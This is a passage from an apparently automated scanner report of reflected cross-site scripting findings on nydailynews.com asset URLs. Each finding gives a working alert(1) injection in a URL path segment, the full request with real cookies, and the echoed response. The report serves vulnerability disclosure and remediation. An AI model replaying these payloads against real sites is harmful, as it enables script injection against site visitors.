Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/errorpage/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.8.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|o|o|o|M|8M8M8YsoH0|o

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:51:01 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69729
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/favicon.icoa8425';alert(1)//f2815976b98';
}
//-->
...[SNIP]...

1.177. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa7d9'%3balert(1)//101192a7b4c was submitted in the REST URL parameter 1. This input was echoed as aa7d9';alert(1)//101192a7b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imgaa7d9'%3balert(1)//101192a7b4c/2011/08/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:17 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/imgaa7d9';alert(1)//101192a7b4c/2011/08/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

1.178. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d79f4'%3balert(1)//1ef7a89ad08 was submitted in the REST URL parameter 2. This input was echoed as d79f4';alert(1)//1ef7a89ad08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011d79f4'%3balert(1)//1ef7a89ad08/08/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:35 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011d79f4';alert(1)//1ef7a89ad08/08/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

1.179. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a069'%3balert(1)//a554b3287db was submitted in the REST URL parameter 3. This input was echoed as 8a069';alert(1)//a554b3287db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/088a069'%3balert(1)//a554b3287db/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:49 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/088a069';alert(1)//a554b3287db/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

1.180. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7529b'%3balert(1)//3afc937eb48 was submitted in the REST URL parameter 4. This input was echoed as 7529b';alert(1)//3afc937eb48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08/127529b'%3balert(1)//3afc937eb48/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:02 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/127529b';alert(1)//3afc937eb48/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

1.181. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e346'%3balert(1)//86988af10f8 was submitted in the REST URL parameter 5. This input was echoed as 4e346';alert(1)//86988af10f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08/12/alg_charla-nash_surgery.jpg4e346'%3balert(1)//86988af10f8 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:15 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
dn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg4e346';alert(1)//86988af10f8';
}
//-->
...[SNIP]...

1.182. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58f10'%3balert(1)//25181935610 was submitted in the REST URL parameter 1. This input was echoed as 58f10';alert(1)//25181935610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img58f10'%3balert(1)//25181935610/2011/08/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:13 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img58f10';alert(1)//25181935610/2011/08/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

1.183. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47b8'%3balert(1)//83a63c7b35c was submitted in the REST URL parameter 2. This input was echoed as b47b8';alert(1)//83a63c7b35c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011b47b8'%3balert(1)//83a63c7b35c/08/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:31 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011b47b8';alert(1)//83a63c7b35c/08/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

1.184. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb460'%3balert(1)//e60c9431fa3 was submitted in the REST URL parameter 3. This input was echoed as bb460';alert(1)//e60c9431fa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08bb460'%3balert(1)//e60c9431fa3/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:44 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08bb460';alert(1)//e60c9431fa3/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

1.185. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66fcf'%3balert(1)//5350e8a8c99 was submitted in the REST URL parameter 4. This input was echoed as 66fcf';alert(1)//5350e8a8c99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08/1266fcf'%3balert(1)//5350e8a8c99/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:57 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/1266fcf';alert(1)//5350e8a8c99/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

1.186. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59514'%3balert(1)//684607607d8 was submitted in the REST URL parameter 5. This input was echoed as 59514';alert(1)//684607607d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08/12/alg_curtis_granderson.jpg59514'%3balert(1)//684607607d8 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:47:10 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg59514';alert(1)//684607607d8';
}
//-->
...[SNIP]...

1.187. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /video/homepage_video.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b465'%3balert(1)//62add0462bb was submitted in the REST URL parameter 1. This input was echoed as 1b465';alert(1)//62add0462bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video1b465'%3balert(1)//62add0462bb/homepage_video.html HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:35:27 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/video1b465';alert(1)//62add0462bb/homepage_video.html';
}
//-->
...[SNIP]...

1.188. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /video/homepage_video.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 299e0'%3balert(1)//bca7c7ba913 was submitted in the REST URL parameter 2. This input was echoed as 299e0';alert(1)//bca7c7ba913 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
